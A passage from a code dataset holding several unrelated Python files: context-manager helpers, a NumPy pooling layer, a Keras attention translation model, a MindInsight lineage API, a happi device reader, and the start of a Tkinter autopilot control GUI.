contextmanager\n\n@contextmanager\ndef shallow_bind(env, keys):\n bk = tuple(env.get(k) for k in keys)\n yield\n for k, v in zip(keys, bk):\n env[k] = v\n\n@contextmanager\ndef pythonpath(new_pythonpath):\n import sys\n old_pythonpath = sys.path\n sys.path = new_pythonpath\n yield\n sys.path = old_pythonpath\n\n@contextmanager\ndef tempdir():\n from shutil import rmtree\n from tempfile import mkdtemp\n d = mkdtemp()\n yield d\n rmtree(d)\n\n@contextmanager\ndef pushd(there):\n from os import chdir, getcwd\n here = getcwd()\n chdir(there)\n yield\n chdir(here)\n","sub_path":"apymake/lib/cm.py","file_name":"cm.py","file_ext":"py","file_size_in_byte":619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"62994284","text":"import numpy as np\nfrom util import pooling2d\n\n\nclass Pooling2D(object):\n def __init__(self, pool_shape, stride, padding = 0, pool_mode = 'max'):\n # FEATURE MAP INPUT SHAPE:\n # 0: width\n # 1: height\n # 2: channel\n self.pool_shape = pool_shape\n self.stride = stride\n self.padding = padding\n self.pool_mode = pool_mode\n self.activation = lambda x: x\n self.activation_deriv = lambda x: 1\n self.input_shape = None\n self.output_shape = None\n\n self.backward_delta = {\n 'max': self.maximum_backward_delta,\n 'avg': self.average_backward_delta\n }\n\n self.updateWBO()\n\n def updateInputShape(self, input_shape):\n self.input_shape = input_shape\n self.updateWBO()\n\n def updateWBO(self):\n if (self.input_shape != None):\n self.output_shape = (((self.input_shape[0] + 2*self.padding - self.pool_shape[0])) // self.stride + 1,\n ((self.input_shape[1] + 2*self.padding - self.pool_shape[1])) // self.stride + 1,\n (self.input_shape[-1]))\n\n def getSaveData(self):\n data = {\n 'name': 'Pooling2D',\n 'input_shape' : self.input_shape,\n 'pool_shape': self.pool_shape,\n 'stride': self.stride,\n 'padding': self.padding,\n 'pool_mode': self.pool_mode\n }\n\n return data\n\n def loadData(self, data):\n pass\n\n def forward(self, feature_maps):\n assert self.input_shape == feature_maps.shape[1:]\n result = np.zeros((\n feature_maps.shape[0], # num_of_feature_maps\n ((feature_maps.shape[1] + self.padding - self.pool_shape[0]) // self.stride) + 1, # width\n ((feature_maps.shape[2] + self.padding - self.pool_shape[1]) // self.stride) + 1, # height\n feature_maps.shape[3] # channel\n ))\n for idx, fmap in enumerate(feature_maps):\n result[idx] = pooling2d(fmap, self.pool_shape, self.stride, self.padding, self.pool_mode)\n\n self.output_shape = result.shape\n return result\n\n def average_backward_delta(self, neuron_input, delta, current_element, dx):\n each_batch, each_row, each_col, each_channel = current_element\n \n temp_pool = neuron_input[\n each_batch,\n (each_row * self.stride):(each_row * self.stride + self.pool_shape[0]),\n (each_col * self.stride):(each_col * self.stride + self.pool_shape[1]),\n each_channel\n ]\n\n # average = delta divided by input shape (width and height)\n average_delta = delta[each_batch, each_row, each_col, each_channel] / temp_pool.shape[0] / temp_pool.shape[1]\n\n dx[\n each_batch,\n (each_row * self.stride):(each_row * self.stride + self.pool_shape[0]),\n (each_col * self.stride):(each_col * self.stride + self.pool_shape[1]),\n each_channel\n ] += np.ones((temp_pool.shape[0], temp_pool.shape[1])) * average_delta\n return dx\n\n def maximum_backward_delta(self, neuron_input, delta, current_element, dx):\n each_batch, each_row, each_col, each_channel = current_element\n\n temp_pool = neuron_input[\n each_batch,\n (each_row * self.stride):(each_row * self.stride + self.pool_shape[0]),\n (each_col * self.stride):(each_col * self.stride + self.pool_shape[1]),\n each_channel\n ]\n # Mask True if element in pool is the max of the pool, else False\n masking = (temp_pool == np.max(temp_pool))\n dx[\n each_batch,\n (each_row * self.stride):(each_row * self.stride + self.pool_shape[0]),\n (each_col * self.stride):(each_col * self.stride + self.pool_shape[1]),\n each_channel\n ] += masking * delta[each_batch, each_row, each_col, each_channel]\n\n return dx\n\n def calcPrevDelta(self, neuron_input, delta, debug=False):\n dx = np.zeros(neuron_input.shape)\n\n for each_batch in range(delta.shape[0]):\n for each_row in range(delta.shape[1]):\n for each_col in range(delta.shape[2]):\n for each_channel in range(delta.shape[3]):\n # store each range variable to a variable, passing it easier to backward delta function\n current_element = [each_batch, each_row, each_col, each_channel]\n if (debug):\n print(\"Current Element:\\n batch :\", each_batch)\n print(\" row :\", each_row)\n print(\" column :\", each_col)\n print(\" channel:\", each_channel)\n dx = self.backward_delta[self.pool_mode](neuron_input, delta, current_element, dx)\n if (debug):\n print(\"\\n\\nDX in this element batch after backward delta\", dx)\n print(\"=============================================\")\n\n return dx\n\n def backprop(self, neuron_input, delta, lr=0.001, debug=False):\n # no weight to update, only pass the error to previous layer\n return np.zeros(()), np.zeros(())\n\n def updateWeight(self, deltaWeight, deltaBias, debug=False):\n # no weight to update, only pass the error to previous layer\n pass\n","sub_path":"src/pooling2d.py","file_name":"pooling2d.py","file_ext":"py","file_size_in_byte":4876,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"156589125","text":"from tensorflow.python.keras.layers import Input, GRU, Dense, Concatenate, TimeDistributed, Bidirectional, Embedding\nfrom tensorflow.python.keras.models import Model\nfrom attention import AttentionLayer\n\n\ndef define_nmt(hidden_size, batch_size, eng_timesteps, eng_vocab_size, ger_timesteps, ger_vocab_size):\n \"\"\" Defining a NMT model \"\"\"\n\n # Define an input sequence and process it.\n embedding_size = 100\n if batch_size:\n encoder_inputs = Input(batch_shape=(batch_size, eng_timesteps), name='encoder_inputs')\n decoder_inputs = Input(batch_shape=(batch_size, ger_timesteps - 1), name='decoder_inputs')\n # else:\n # encoder_inputs = Input(shape=(eng_timesteps), name='encoder_inputs')\n # decoder_inputs = Input(shape=(fr_timesteps - 1, fr_vsize), name='decoder_inputs')\n\n encoder_embedding = Embedding(input_dim = eng_vocab_size, output_dim = embedding_size)\n embedded_encoder_inputs = encoder_embedding(encoder_inputs)\n # Encoder GRU\n encoder_gru = Bidirectional(GRU(hidden_size, return_sequences=True, return_state=True, name='encoder_gru'), name='bidirectional_encoder')\n encoder_out, encoder_fwd_state, encoder_back_state = encoder_gru(embedded_encoder_inputs)\n\n decoder_embedding = Embedding(input_dim = ger_vocab_size, output_dim = embedding_size)\n embedded_decoder_inputs = decoder_embedding(decoder_inputs)\n # Set up the decoder GRU, using `encoder_states` as initial state.\n decoder_gru = Bidirectional(GRU(hidden_size, return_sequences=True, return_state=True, name='decoder_gru'), name='bidirectional_decoder')\n decoder_out, decoder_fwd_state, decoder_back_state = decoder_gru(embedded_decoder_inputs, initial_state=[encoder_fwd_state, encoder_back_state])\n\n # Attention layer\n attn_layer = AttentionLayer(name='attention_layer')\n attn_out, attn_states = attn_layer([encoder_out, decoder_out])\n\n # Concat attention input and decoder GRU output\n decoder_concat_input = Concatenate(axis=-1, name='concat_layer')([decoder_out, attn_out])\n\n # Dense layer\n dense = Dense(ger_vocab_size, activation='softmax', name='softmax_layer')\n dense_time = TimeDistributed(dense, name='time_distributed_layer')\n decoder_pred = dense_time(decoder_concat_input)\n\n # Full model\n full_model = Model(inputs=[encoder_inputs, decoder_inputs], outputs=decoder_pred)\n full_model.compile(optimizer='adam', loss='categorical_crossentropy')\n\n full_model.summary()\n\n \"\"\" Inference model \"\"\"\n batch_size = 1\n\n \"\"\" Encoder (Inference) model \"\"\"\n encoder_inf_inputs = Input(batch_shape=(batch_size, eng_timesteps), name='encoder_inf_inputs')\n encoder_inf_embedded_inputs = encoder_embedding(encoder_inf_inputs)\n encoder_inf_out, encoder_inf_fwd_state, encoder_inf_back_state = encoder_gru(encoder_inf_embedded_inputs)\n encoder_model = Model(inputs=encoder_inf_inputs, outputs=[encoder_inf_out, encoder_inf_fwd_state, encoder_inf_back_state])\n\n \"\"\" Decoder (Inference) model \"\"\"\n decoder_inf_inputs = Input(batch_shape=(batch_size, 1), name='decoder_word_inputs')\n encoder_inf_states = Input(batch_shape=(batch_size, eng_timesteps, 2*hidden_size), name='encoder_inf_states')\n decoder_init_fwd_state = Input(batch_shape=(batch_size, hidden_size), name='decoder_fwd_init')\n decoder_init_back_state = Input(batch_shape=(batch_size, hidden_size), name='decoder_back_init')\n\n decoder_inf_embedded_inputs = decoder_embedding(decoder_inf_inputs)\n decoder_inf_out, decoder_inf_fwd_state, decoder_inf_back_state = decoder_gru(decoder_inf_embedded_inputs, initial_state=[decoder_init_fwd_state, decoder_init_back_state])\n attn_inf_out, attn_inf_states = attn_layer([encoder_inf_states, decoder_inf_out])\n decoder_inf_concat = Concatenate(axis=-1, name='concat')([decoder_inf_out, attn_inf_out])\n decoder_inf_pred = TimeDistributed(dense)(decoder_inf_concat)\n decoder_model = Model(inputs=[encoder_inf_states, decoder_init_fwd_state, decoder_init_back_state, decoder_inf_inputs],\n outputs=[decoder_inf_pred, attn_inf_states, decoder_inf_fwd_state, decoder_inf_back_state])\n # encoder_model = \"\"\n # decoder_model = \"\"\n return full_model, encoder_model, decoder_model\n\n\nif __name__ == '__main__':\n\n \"\"\" Checking nmt model for toy examples \"\"\"\n define_nmt(64, None, 20, 30, 20, 20)","sub_path":"Neural_Machine_Translation/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":4347,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"569245112","text":"# Copyright 2019 Huawei Technologies Co., Ltd\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ============================================================================\n\"\"\"This file is used to define the model lineage python api.\"\"\"\nimport os\nimport numpy as np\nimport pandas as pd\n\nfrom mindinsight.lineagemgr.common.exceptions.exceptions import LineageParamValueError, \\\n LineageQuerySummaryDataError, LineageParamSummaryPathError, \\\n LineageQuerierParamException, LineageDirNotExistError, LineageSearchConditionParamError, \\\n LineageParamTypeError, LineageSummaryParseException\nfrom mindinsight.lineagemgr.common.log import logger as log\nfrom mindinsight.lineagemgr.common.utils import normalize_summary_dir, get_relative_path\nfrom mindinsight.lineagemgr.common.validator.model_parameter import SearchModelConditionParameter\nfrom mindinsight.lineagemgr.common.validator.validate import validate_filter_key, validate_search_model_condition, \\\n validate_condition, validate_path, validate_train_id\nfrom mindinsight.lineagemgr.lineage_parser import LineageParser, LineageOrganizer\nfrom mindinsight.lineagemgr.querier.querier import Querier\nfrom mindinsight.optimizer.common.enums import ReasonCode\nfrom mindinsight.optimizer.utils.utils import is_simple_numpy_number\nfrom mindinsight.utils.exceptions import MindInsightException\n\n_METRIC_PREFIX = \"[M]\"\n_USER_DEFINED_PREFIX = \"[U]\"\n\nUSER_DEFINED_INFO_LIMIT = 100\n\n\ndef get_summary_lineage(data_manager=None, summary_dir=None, keys=None):\n \"\"\"\n Get summary lineage from data_manager or parsing from summaries.\n\n One of data_manager or summary_dir needs to be specified. Support getting\n super_lineage_obj from data_manager or parsing summaries by summary_dir.\n\n Args:\n data_manager (DataManager): Data manager defined as\n mindinsight.datavisual.data_transform.data_manager.DataManager\n summary_dir (str): The summary directory. It contains summary logs for\n one training.\n keys (list[str]): The filter keys of lineage information. The acceptable\n keys are `metric`, `user_defined`, `hyper_parameters`, `algorithm`,\n `train_dataset`, `model`, `valid_dataset` and `dataset_graph`.\n If it is `None`, all information will be returned. Default: None.\n\n Returns:\n dict, the lineage information for one training.\n\n Raises:\n LineageParamSummaryPathError: If summary path is invalid.\n LineageQuerySummaryDataError: If querying summary data fails.\n LineageFileNotFoundError: If the summary log file is not found.\n\n \"\"\"\n default_result = {}\n if data_manager is None and summary_dir is None:\n raise LineageParamTypeError(\"One of data_manager or summary_dir needs to be specified.\")\n if data_manager is not None and summary_dir is None:\n raise LineageParamTypeError(\"If data_manager is specified, the summary_dir needs to be \"\n \"specified as relative path.\")\n\n if keys is not None:\n validate_filter_key(keys)\n\n if data_manager is None:\n normalize_summary_dir(summary_dir)\n super_lineage_obj = LineageParser(summary_dir).super_lineage_obj\n else:\n validate_train_id(summary_dir)\n super_lineage_obj = LineageOrganizer(data_manager=data_manager).get_super_lineage_obj(summary_dir)\n\n if super_lineage_obj is None:\n return default_result\n\n try:\n result = Querier({summary_dir: super_lineage_obj}).get_summary_lineage(summary_dir, keys)\n except (LineageQuerierParamException, LineageParamTypeError) as error:\n log.error(str(error))\n log.exception(error)\n raise LineageQuerySummaryDataError(\"Get summary lineage failed.\")\n return result[0]\n\n\ndef filter_summary_lineage(data_manager=None, summary_base_dir=None, search_condition=None, added=False):\n \"\"\"\n Filter summary lineage from data_manager or parsing from summaries.\n\n One of data_manager or summary_base_dir needs to be specified. Support getting\n super_lineage_obj from data_manager or parsing summaries by summary_base_dir.\n\n Args:\n data_manager (DataManager): Data manager defined as\n mindinsight.datavisual.data_transform.data_manager.DataManager\n summary_base_dir (str): The summary base directory. It contains summary\n directories generated by training.\n search_condition (dict): The search condition.\n \"\"\"\n if data_manager is None and summary_base_dir is None:\n raise LineageParamTypeError(\"One of data_manager or summary_base_dir needs to be specified.\")\n\n if data_manager is None:\n summary_base_dir = normalize_summary_dir(summary_base_dir)\n else:\n summary_base_dir = data_manager.summary_base_dir\n\n search_condition = {} if search_condition is None else search_condition\n\n try:\n validate_condition(search_condition)\n validate_search_model_condition(SearchModelConditionParameter, search_condition)\n except MindInsightException as error:\n log.error(str(error))\n log.exception(error)\n raise LineageSearchConditionParamError(str(error.message))\n\n try:\n search_condition = _convert_relative_path_to_abspath(summary_base_dir, search_condition)\n except (LineageParamValueError, LineageDirNotExistError) as error:\n log.error(str(error))\n log.exception(error)\n raise LineageParamSummaryPathError(str(error.message))\n\n try:\n lineage_objects = LineageOrganizer(data_manager, summary_base_dir).super_lineage_objs\n result = Querier(lineage_objects).filter_summary_lineage(\n condition=search_condition,\n added=added\n )\n except LineageSummaryParseException:\n result = {'object': [], 'count': 0}\n except (LineageQuerierParamException, LineageParamTypeError) as error:\n log.error(str(error))\n log.exception(error)\n raise LineageQuerySummaryDataError(\"Filter summary lineage failed.\")\n\n return result\n\n\ndef _convert_relative_path_to_abspath(summary_base_dir, search_condition):\n \"\"\"\n Convert relative path to absolute path.\n\n Args:\n summary_base_dir (str): The summary base directory.\n search_condition (dict): The search condition.\n\n Returns:\n dict, the updated search_condition.\n\n Raises:\n LineageParamValueError: If the value of input_name is invalid.\n \"\"\"\n if (\"summary_dir\" not in search_condition) or (not search_condition.get(\"summary_dir\")):\n return search_condition\n\n summary_dir_condition = search_condition.get(\"summary_dir\")\n\n if 'in' in summary_dir_condition:\n summary_paths = []\n for summary_dir in summary_dir_condition.get('in'):\n if summary_dir.startswith('./'):\n abs_dir = os.path.join(\n summary_base_dir, summary_dir[2:]\n )\n abs_dir = validate_path(abs_dir)\n else:\n abs_dir = validate_path(summary_dir)\n summary_paths.append(abs_dir)\n search_condition.get('summary_dir')['in'] = summary_paths\n\n if 'eq' in summary_dir_condition:\n summary_dir = summary_dir_condition.get('eq')\n if summary_dir.startswith('./'):\n abs_dir = os.path.join(\n summary_base_dir, summary_dir[2:]\n )\n abs_dir = validate_path(abs_dir)\n else:\n abs_dir = validate_path(summary_dir)\n search_condition.get('summary_dir')['eq'] = abs_dir\n\n return search_condition\n\n\ndef get_lineage_table(data_manager, search_condition):\n \"\"\"Get lineage data in a table from data manager.\"\"\"\n summary_base_dir = data_manager.summary_base_dir\n lineages = filter_summary_lineage(data_manager=data_manager, search_condition=search_condition)\n lineage_objects = lineages.get(\"object\", [])\n\n # Step 1, get column names\n column_names = _get_columns_name(lineage_objects)\n\n # Step 2, collect data\n column_data = _organize_data_to_matrix(lineage_objects, column_names, summary_base_dir)\n\n return LineageTable(pd.DataFrame(column_data))\n\n\ndef _get_columns_name(lineage_objects):\n \"\"\"Get columns name.\"\"\"\n column_names = set()\n user_defined_num = 0\n for lineage in lineage_objects:\n model_lineage = lineage.get(\"model_lineage\", {})\n metric = model_lineage.get(\"metric\", {})\n metric_names = tuple('{}{}'.format(_METRIC_PREFIX, key) for key in metric.keys())\n user_defined = model_lineage.get(\"user_defined\", {})\n user_defined_names = tuple('{}{}'.format(_USER_DEFINED_PREFIX, key) for key in user_defined.keys())\n model_lineage_temp = list(model_lineage.keys())\n for key in model_lineage_temp:\n if key in [\"metric\", \"user_defined\"]:\n model_lineage_temp.remove(key)\n column_names.update(model_lineage_temp)\n column_names.update(metric_names)\n if user_defined_num + len(user_defined_names) <= USER_DEFINED_INFO_LIMIT:\n column_names.update(user_defined_names)\n user_defined_num += len(user_defined_names)\n elif user_defined_num < USER_DEFINED_INFO_LIMIT <= user_defined_num + len(user_defined_names):\n names = []\n for i in range(USER_DEFINED_INFO_LIMIT - user_defined_num):\n names.append(user_defined_names[i])\n column_names.update(names)\n user_defined_num += len(names)\n log.info(\"Partial user_defined_info is deleted. Currently saved length is: %s.\", user_defined_num)\n else:\n log.info(\"The quantity of user_defined_info has reached the limit %s.\", USER_DEFINED_INFO_LIMIT)\n column_names.update([\"train_id\"])\n\n return column_names\n\n\ndef _organize_data_to_matrix(lineage_objects, column_names, summary_base_dir):\n \"\"\"Collect data and transform to matrix.\"\"\"\n cnt_lineages = len(lineage_objects)\n column_data = {key: [None] * cnt_lineages for key in column_names}\n for ind, lineage in enumerate(lineage_objects):\n\n train_id = get_relative_path(lineage.get(\"summary_dir\"), summary_base_dir)\n\n model_lineage = lineage.get(\"model_lineage\", {})\n metric = model_lineage.pop(\"metric\", {})\n metric_content = {\n '{}{}'.format(_METRIC_PREFIX, key): val for key, val in metric.items()\n }\n user_defined = model_lineage.pop(\"user_defined\", {})\n user_defined_content = {\n '{}{}'.format(_USER_DEFINED_PREFIX, key): val for key, val in user_defined.items()\n }\n final_content = {}\n final_content.update(model_lineage)\n final_content.update(metric_content)\n final_content.update(user_defined_content)\n final_content.update({\"train_id\": train_id})\n for key, val in final_content.items():\n if isinstance(val, str) and val.lower() in ['nan', 'inf']:\n val = np.nan\n if key in column_data:\n column_data[key][ind] = val\n return column_data\n\n\nclass LineageTable:\n \"\"\"Wrap lineage data in a table.\"\"\"\n _LOSS_NAME = \"loss\"\n _NOT_TUNABLE_NAMES = [_LOSS_NAME, \"train_id\", \"device_num\", \"model_size\",\n \"test_dataset_count\", \"train_dataset_count\"]\n\n def __init__(self, df: pd.DataFrame):\n self._df = df\n self.train_ids = self._df[\"train_id\"].tolist()\n self._drop_columns_info = []\n self._remove_unsupported_columns()\n\n def _remove_unsupported_columns(self):\n \"\"\"Remove unsupported columns.\"\"\"\n columns_to_drop = []\n for name, data in self._df.iteritems():\n if not is_simple_numpy_number(data.dtype):\n columns_to_drop.append(name)\n\n if columns_to_drop:\n log.debug(\"Unsupported columns: %s\", columns_to_drop)\n self._df = self._df.drop(columns=columns_to_drop)\n\n for name in columns_to_drop:\n if not name.startswith(_USER_DEFINED_PREFIX):\n continue\n self._drop_columns_info.append({\n \"name\": name,\n \"unselected\": True,\n \"reason_code\": ReasonCode.NOT_ALL_NUMBERS.value\n })\n\n @property\n def target_names(self):\n \"\"\"Get names for optimize targets (eg loss, accuracy).\"\"\"\n target_names = [name for name in self._df.columns if name.startswith(_METRIC_PREFIX)]\n if self._LOSS_NAME in self._df.columns:\n target_names.append(self._LOSS_NAME)\n return target_names\n\n @property\n def hyper_param_names(self, tunable=True):\n \"\"\"Get hyper param names.\"\"\"\n blocked_names = self._get_blocked_names(tunable)\n\n hyper_param_names = [\n name for name in self._df.columns\n if not name.startswith(_METRIC_PREFIX) and name not in blocked_names]\n\n if self._LOSS_NAME in hyper_param_names:\n hyper_param_names.remove(self._LOSS_NAME)\n\n return hyper_param_names\n\n def _get_blocked_names(self, tunable):\n if tunable:\n block_names = self._NOT_TUNABLE_NAMES\n else:\n block_names = []\n return block_names\n\n @property\n def user_defined_hyper_param_names(self):\n \"\"\"Get user defined hyper param names.\"\"\"\n names = [name for name in self._df.columns if name.startswith(_USER_DEFINED_PREFIX)]\n return names\n\n def get_column(self, name):\n \"\"\"\n Get data for specified column.\n Args:\n name (str): column name.\n\n Returns:\n np.ndarray, specified column.\n\n \"\"\"\n return self._df[name]\n\n def get_column_values(self, name):\n \"\"\"\n Get data for specified column.\n Args:\n name (str): column name.\n\n Returns:\n list, specified column data. If value is np.nan, transform to None.\n\n \"\"\"\n return [None if np.isnan(num) else num for num in self._df[name].tolist()]\n\n @property\n def df(self):\n \"\"\"Get the DataFrame.\"\"\"\n return self._df\n\n @property\n def drop_column_info(self):\n \"\"\"Get dropped columns info.\"\"\"\n return self._drop_columns_info\n","sub_path":"mindinsight/lineagemgr/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":14667,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"182481951","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\nRead the beamline database and construct objects\n\"\"\"\nimport logging\n\nimport happi\n\nimport pcdsdevices\n\nlogger = logging.getLogger(__name__)\n_client = None\n\n\ndef read_happi(client=None):\n \"\"\"\n Connect to the happi database and return a list of all devices.\n\n Parameters\n ----------\n client : happi.Client, optional\n Instance of Client to use for the read. Included as a parameter to be\n substituted with the mock client for testing. If not provided, we'll\n use the default client.\n\n Returns\n -------\n devices : list of happi.Device\n \"\"\"\n if client is None:\n global _client\n if _client is None:\n logger.info(\"Instantiating happi client\")\n _client = happi.Client()\n client = _client\n logger.info(\"Requesting all devices from happi client of class %s\",\n type(client))\n return client.all_devices\n\n\ndef construct_device(happi_object, device_class=None, info_map=None, **kwargs):\n \"\"\"\n Create a functional device from the information stored in a happi device.\n\n Parameters\n ----------\n happi_object : happi.Device\n\n device_class : class, optional\n Class to instantiate with given happi information. If no class is given\n one will be selected using the :func:`.pick_class` function\n\n info_map : dict, optional\n Rename happi information to match Device keywords. Conversion from info\n name to keyword should be entered as happi info name -> device kwarg\n name pairs\n\n kwargs :\n Additional keywords are passed into the device constructor\n Returns\n -------\n device : ophyd.Device\n \"\"\"\n info = {}\n info_map = info_map or {}\n\n #Gather information from device\n for entry in happi_object.info_names:\n try:\n info[entry] = getattr(happi_object, entry)\n except AttributeError:\n pass\n logger.debug(\"Extracted info dictionary from happi: %s\", info)\n\n #Convert keyword information\n for key, value in info_map.items():\n info[value] = info.pop(key)\n\n #Class selection\n if not device_class:\n device_type = happi_object.__class__.__name__\n device_class = pick_class(device_type, info)\n\n #Instantiate device with information\n return device_class(db_info=happi_object.post(), **info, **kwargs)\n\n\ndef pick_class(base, info):\n \"\"\"\n Given information from happi, determine which device subclass to use. add\n kwargs to info if necessary.\n\n Parameters\n ----------\n base : str\n A string representation of the device class name from happi. These\n should always match an available class in module.\n info : dict\n A dictionary mapping of happi entry info to stored value. Eventually\n this will be passed as kwargs to instantiate the device object. This\n may be mutated in this function to pass additional args.\n \"\"\"\n clsname = base\n if base == \"PulsePicker\":\n if info[\"beamline\"] in (\"XCS\", \"XPP\"):\n clsname += \"Pink\"\n # TODO find ioc pvs as needed and add to info\n # probably scrape iocmanager and iocdata\n return getattr(pcdsdevices, clsname)\n","sub_path":"pcdsdevices/happireader.py","file_name":"happireader.py","file_ext":"py","file_size_in_byte":3233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"79413124","text":"from tkinter import *\nfrom tkinter import filedialog\nimport threading\nimport Autopiloto_Def.Libreria_Control_5_GUI as LC\nimport Autopiloto_Def.Libreria_vision_GUI_2 as LV\nimport matplotlib\nfrom matplotlib.backends.backend_tkagg import FigureCanvasTkAgg\nmatplotlib.use('TkAgg')\nfrom tensorflow.keras.models import load_model\n\n\n\nclass Pagina_principal():\n def __init__(self,raiz):\n self.Qgc=LC.QGC()\n self.raiz=raiz\n self.Verbose_options=Verbose_options()\n self.miframe = Frame(raiz)\n self.miframe.pack()\n self.Vision=0\n # ------------------------------------------------\n # -----------------Cajas texto--------------------\n # ------------------------------------------------\n self.metros = Entry(self.miframe)\n self.metros.grid(row=1, column=7)\n self.Latitud = Entry(self.miframe)\n self.Latitud.grid(row=2, column=5)\n self.Longitud = Entry(self.miframe)\n self.Longitud.grid(row=2, column=7)\n self.Pitch = Entry(self.miframe)\n self.Pitch.grid(row=7, column=5)\n self.Roll = Entry(self.miframe)\n self.Roll.grid(row=7, column=7)\n # ------------------------------------------------\n # -----------------Labels-------------------------\n # ------------------------------------------------\n Label(self.miframe, text=\"Latitud:\").grid(row=2, column=4)\n Label(self.miframe, text=\"Metros:\").grid(row=1, column=6)\n Label(self.miframe, text=\"Longitud:\").grid(row=2, column=6)\n Label(self.miframe, text=\"Pitch:\").grid(row=7, column=4)\n Label(self.miframe, text=\"Roll:\").grid(row=7, column=6)\n # ------------------------------------------------\n # -----------------Botones------------------------\n # ------------------------------------------------\n self.GoTo = Button(self.miframe, text=\" GoTo \",command=self.Actuar_GoTo,bg='white',width=10)\n self.GoTo.grid(row=2, column=8)\n self.GoTo_activo=0\n self.Waypoint=LC.Waypoint(21,-157,500,100,1)\n self.Mission = Button(self.miframe, text=\"Mission\",command=self.Actuar_Mision,bg='white',width=10)\n self.Mission.grid(row=3, column=8,padx=5)\n self.Mission_activo = 0\n self.Altitud = Button(self.miframe, text=\"Altitud\",command=self.Actuar_Altitud,bg='white',width=10)\n self.Altitud.grid(row=1, column=8)\n self.Altitud_activo=0\n self.Altitud_vuelo=500\n self.Takeoff = Button(self.miframe, text=\"Takeoff\",command=self.Actuar_Takeoff,bg='white',width=10)\n self.Takeoff.grid(row=4, column=8)\n self.Takeoff_activo=0\n self.Land = Button(self.miframe, text=\" Land \",command=self.Actuar_Land,bg='white',width=10)\n self.Land.grid(row=5, column=8)\n self.Land_activo = 0\n self.AutoLand = Button(self.miframe, text=\" Auto-Land \",command=self.Actuar_Auto_Land,bg='white',width=10)\n self.AutoLand.grid(row=6, column=8)\n self.AutoLand_activo = 0\n self.Calibracion = Button(self.miframe, text=\" Calibracion \",command=self.Actuar_Calibracion,bg='white',width=10)\n self.Calibracion.grid(row=7, column=8)\n self.Calibracion_activo = 0\n # ------------------------------------------------\n # -----------------Texto--------------------------\n # ------------------------------------------------\n Label(self.miframe, text=\"Output:\").place(x=0,y=80)\n self.Texto=Text(self.miframe,background=\"white\", width=38, height=6)\n self.Texto.place(x=45,y=55)\n # ------------------------------------------------\n # -----------------Menu---------------------------\n # ------------------------------------------------\n menu = Menu(raiz)\n raiz.config(menu=menu)\n # Mission\n Mission = Menu(menu, tearoff=0)\n menu.add_cascade(label=\"Mission\", menu=Mission)\n Mission.add_command(label=\"Create Mission\",command=lambda:Pagina_Mission(self.miframe,self.Qgc,self))\n Mission.add_command(label=\"Load Mission\", command=self.Cargar_mission)\n # Control\n Control = Menu(menu, tearoff=0)\n menu.add_cascade(label=\"Control\", menu=Control)\n Control.add_command(label=\"Tunning PID\",command=lambda:Pagina_PIDs(self.miframe,self.Qgc,self))\n Control.add_command(label=\"Load PID\", command=self.Cargar_PIDs)\n # Verbose\n Verbose = Menu(menu, tearoff=0)\n menu.add_cascade(label=\"Verbose\", menu=Verbose)\n Verbose.add_command(label=\"Options\",command=lambda:Pagina_Verbose(self.miframe,self))\n # Comm\n Comunications = Menu(menu, tearoff=0)\n menu.add_cascade(label=\"Comunications\", menu=Comunications)\n Comunications.add_command(label=\"Config\",command=lambda:Pagina_Comm(self.miframe,self))\n # IA\n IA = Menu(menu, tearoff=0)\n menu.add_cascade(label=\"IA\", menu=IA)\n IA.add_command(label=\"IA config\",command=lambda:Pagina_IA(self.miframe,self))\n\n if self.Qgc.Modelo is None:\n self.AutoLand.configure(state=DISABLED)\n if self.Qgc.Mission is None or self.Qgc.Modelo is None:\n self.Mission.configure(state=DISABLED)\n\n\n # ------------------------------------------------\n # -----------------Funciones Menu-----------------\n # ------------------------------------------------\n def Cargar_mission(self):\n Fichero = filedialog.askopenfilename(title=\"Abrir\", filetypes=((\"Fichero txt\", \"*.txt\"),))\n Mission = []\n try:\n Fichero = open(Fichero, \"r\")\n for lines in Fichero.readlines():\n line = lines.split(',')\n Mission.append(LC.Waypoint(float(line[0]), float(line[1]), float(line[2]), int(line[3]), int(line[4])))\n self.Qgc.Mission = Mission\n self.Texto.insert(\"insert\", \"Mision cargada correctamente\\n\")\n print('Cargada')\n if self.Qgc.Modelo is not None:\n self.Mission.configure(state=NORMAL)\n else:\n print('Falta IA')\n self.Texto.insert(\"insert\", \"Falta IA\\n\")\n except: # Si no hay mision se define una por defecto\n print('No hay mision')\n\n def Cargar_PIDs(self):\n Control=LC.PIDs()\n i=0\n Fichero = filedialog.askopenfilename(title=\"Abrir\", filetypes=((\"Fichero txt\", \"*.txt\"),))\n try:\n Fichero = open(Fichero, \"r\")\n for lines in Fichero.readlines():\n line = lines.split(',')\n if i==0:\n Control.PID_Heading.tunings=(float(line[0]), float(line[1]), float(line[2]))\n elif i==1:\n Control.PID_Altitud.tunings=(float(line[0]), float(line[1]), float(line[2]))\n elif i==2:\n Control.PID_Roll.tunings=(float(line[0]), float(line[1]), float(line[2]))\n elif i==3:\n Control.PID_Pitch.tunings=(float(line[0]), float(line[1]), float(line[2]))\n elif i==4:\n Control.PID_AirSpeed.tunings=(float(line[0]), float(line[1]), float(line[2]))\n i+=1\n self.Qgc.Control = Control\n print('Cargados')\n except: # Si no hay mision se define una por defecto\n print('No hay PIDs o no estan completos')\n\n # ------------------------------------------------\n # -----------------FUNCIONES BOTONES--------------\n # ------------------------------------------------\n\n def Actuar_Mision(self):\n if self.Mission_activo==0:\n if not self.Vision.is_alive():\n 